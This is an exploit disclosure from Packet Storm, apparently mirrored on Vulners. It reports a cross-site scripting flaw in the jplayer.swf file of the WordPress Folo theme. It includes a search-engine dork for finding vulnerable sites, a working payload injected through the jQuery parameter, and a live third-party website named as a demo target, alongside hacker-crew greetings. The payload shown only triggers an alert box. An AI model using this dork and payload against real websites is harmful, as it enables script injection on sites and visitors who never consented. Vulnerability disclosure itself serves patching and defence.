WordPress Folo Theme Cross Site Scripting

🗓️ 30 Nov 2013 00:00:00Reported by DarksnipperType

packetstorm🔗 packetstormsecurity.com👁 22 Views

WordPress Folo Theme xss Vulnerability reported by Darksnipper

`#####################################  
Title:Wordpress Folo Theme xss Vulnerability  
#####################  
##############################################################  
  
__ __ _____ _ ______ ______ _______ _____  
| \/ | /\ | __ \| | | ____| ____|__ __/ ____|  
| \ / | / \ | | | | | | |__ | |__ | | | (___  
| |\/| | / /\ \ | | | | | | __| | __| | | \___ \  
| | | |/ ____ \| |__| | |____| |____| |____ | | ____) |  
|_| |_/_/ \_\_____/|______|______|______| |_| |_____/  
  
##############################################################  
#Author:Darksnipper  
  
#Email:[email protected]  
  
#####################################  
#Home:- www.MadLeeTs.com  
#####################################  
  
#####################################  
#Home:- www.CyberCoderss.Blogspot.com  
#####################################  
  
Vendor Link:http://themify.me/themes/folo  
  
Dork:-inurl:"inurl:/wp-content/themes/folo/"  
  
Tested On:- Windows 7,Linux,Windows xp  
  
######################################################################  
#P.o.c  
  
http: //127.0.0.1/wp-content/themes/folo/assets/js/jplayer.swf  
  
payload  
  
?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//  
  
Demo:-  
  
krushlicious.com/wp-content/themes/folo/assets/js/jplayer.swf  
payload:-  
?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//  
  
  
Like:-  
  
http://127.0.01/wp-content/themes/folo/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/MaDLeets/)//  
  
  
  
########################################################################  
Greetz:1337,Dream.killer,Soul~inj3ct0r,Force-Ex,x3o-1337,Shadow008,H4x0r  
Hussy,H4x0rl1f3,Invectus,Sahrawi  
Hacker,Madc0de Haxor,Makman,Sniffer,Retno Pro, Tr4ck3r,b0x,Gujjar  
Pcp,P4k Command3r,Pain006,Anon DeXter,  
Ap3x Pr3d1at0r,Ment@l Mind,Evan Ricafort,Syndicate,Root Haxor,Kd  
Divakar,r00X,,zHC Snipper,All Madleets Members,Kashmiri HackerS.  
########################################################################  
`

30 Nov 2013 00:00Current

7High risk

Vulners AI Score7